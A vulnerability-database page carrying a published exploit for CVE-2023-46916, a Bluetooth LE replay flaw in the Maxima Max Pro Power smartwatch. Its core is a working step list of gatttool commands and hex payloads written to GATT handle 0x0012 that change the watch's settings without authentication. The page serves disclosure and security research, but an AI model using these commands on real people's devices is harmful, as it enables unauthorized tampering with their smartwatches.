Vulners
Lucene search
Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated)
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated) Vulnerability | 4 Mar 202400:00 | – | zdt |
 | CVE-2023-46916 | 7 Dec 202306:15 | – | attackerkb |
 | CVE-2023-46916 | 30 Dec 202311:06 | – | circl |
 | Maxima Max Pro Power Security Vulnerability | 7 Dec 202300:00 | – | cnnvd |
 | CVE-2023-46916 | 7 Dec 202300:00 | – | cve |
 | CVE-2023-46916 | 7 Dec 202300:00 | – | cvelist |
 | EUVD-2023-51080 | 3 Oct 202520:07 | – | euvd |
 | CVE-2023-46916 | 7 Dec 202306:15 | – | nvd |
 | Maxima Max Pro Power 1.0 486A BLE Traffic Replay | 13 Nov 202300:00 | – | packetstorm |
 | Design/Logic Flaw | 7 Dec 202306:15 | – | prion |
10
# Exploit Title: Maxima Max Pro Power - BLE Traffic Replay (Unauthenticated)
# Date: 13-Nov-2023
# Exploit Author: Alok kumar ([email protected]), Cyberpwn Technologies Pvt. Ltd.
# Vendor Homepage: https://www.maximawatches.com
# Product Link: https://www.maximawatches.com/products/max-pro-power
# Firmware Version: v1.0 486A
# Tested on: Maxima Max Pro Power
# CVE : CVE-2023-46916
# It was observed that an attacker can send crafted HEX values to “0x0012” GATT Charactristic handle on the watch to perform unauthorized actions like change Time display format, update Time, update notifications.
# And since, there is no integrity check for data received by the watch, an attacker can sniff the same value on smartwatch A, which later can be sent to smartwatch B leading unauthorized actions
# Scan for bluetooth LE devices nearby using any capable scanner, bluetoothctl is used in this “sudo bluetoothctl scan le”
# “sudo gattool -I” Starts gattool in interactive mode.
# “connect <MAC_OF_DEVICE_FROM_STEP_1>” Connects to the specified BLE device.
# “char-desc” Lists all handles for the device.
# Run “mtu 247” in Gatttool after connection to set MTU for active connection.
# Run “char-read-hnd 0x0054” in Gatttool. Trust And Authorize the device on attacker's machine when prompted.
# "char-write-req 0x0012 ab00000e5422002202002b0009000000059fffffffff" disables Raise to wake feature.
# "char-write-req 0x0012 ab00000ec42f002302002b0009010000059fffffffff" enables Raise to wake feature.
# "char-write-req 0x0012 ab000009c2ee0034050023000400030501" starts Heart Rate monitor
# "char-write-req 0x0012 ab000007c323001902001800020002" sets Time Format to 24 Hrs on smartwatch.
# "char-write-req 0x0012 ab0000070022001802001800020006" sets Time Format to 12 Hrs on smartwatch.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Mar 2024 00:00Current
4.7Medium risk
Vulners AI Score4.7
CVSS 3.14.3
EPSS0.00066
SSVC